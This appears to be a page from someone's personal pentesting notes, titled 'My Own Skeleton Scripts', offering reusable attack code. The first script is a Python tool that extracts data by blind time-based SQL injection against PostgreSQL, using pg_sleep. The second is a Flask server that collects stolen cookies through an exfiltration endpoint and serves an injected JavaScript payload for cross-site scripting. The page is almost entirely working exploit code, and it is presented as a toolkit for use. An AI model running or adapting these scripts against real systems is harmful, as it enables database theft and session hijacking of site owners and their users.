My Own Skeleton Scripts

Spagetti but works and its simple lol

Blind Time Based SQL Injection (PostgreSQL example)

import requests

url = "" # change this
letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
sqling = True
position = 1
result = ""

while sqling:
    for letter in letters:
        # define paylod
        sqli_payload = "(SELECT CASE WHEN SUBSTRING(version(),"+ str(position) +",1)=$$" + letter + "$$ THEN (SELECT NULL FROM pg_sleep(5)) ELSE $$$$ END)-- -" # change this
        
        # send request
        r_sqli = requests.get(url + "/endpoint?param=" + sqli_payload, verify=False) # change this

        # if character is correct
        if r_sqli.elapsed.total_seconds() > 5:
            result += letter
            position += 1
            print(result)
            break

        # end loop if not found
        if letter == '9':
            sqling = False

XSS Catcher

You can also not use threading and put method call in send function (also it is required to cut the cookie)

from flask import Flask, request, Response
import time
import threading

done = False
stolenCookie = ""

def worker():
    app = Flask(__name__)


    # usage:
    # curl -k "http://127.0.0.1:80/send?data=test"
    @app.route('/send')
    def send():
        global stolenCookie
        data = request.args.get('data')
        stolenCookie = data
        return 'OK'

    # usage:
    # <script src="http://[IP]/dynamic.js"
    @app.route("/dynamic.js")
    def dynamic_js():
        js_code = """
        alert(1)
        """
        return Response(js_code, mimetype="application/javascript")
    
    app.run(port=80, host='0.0.0.0')

if __name__ == '__main__':
    threading.Thread(target=worker).start() # API thread

    # exploit thread
    while True:
        time.sleep(1)
        print(stolenCookie)

PreviousXSS Catcher NextDownloading the code

Last updated 3 months ago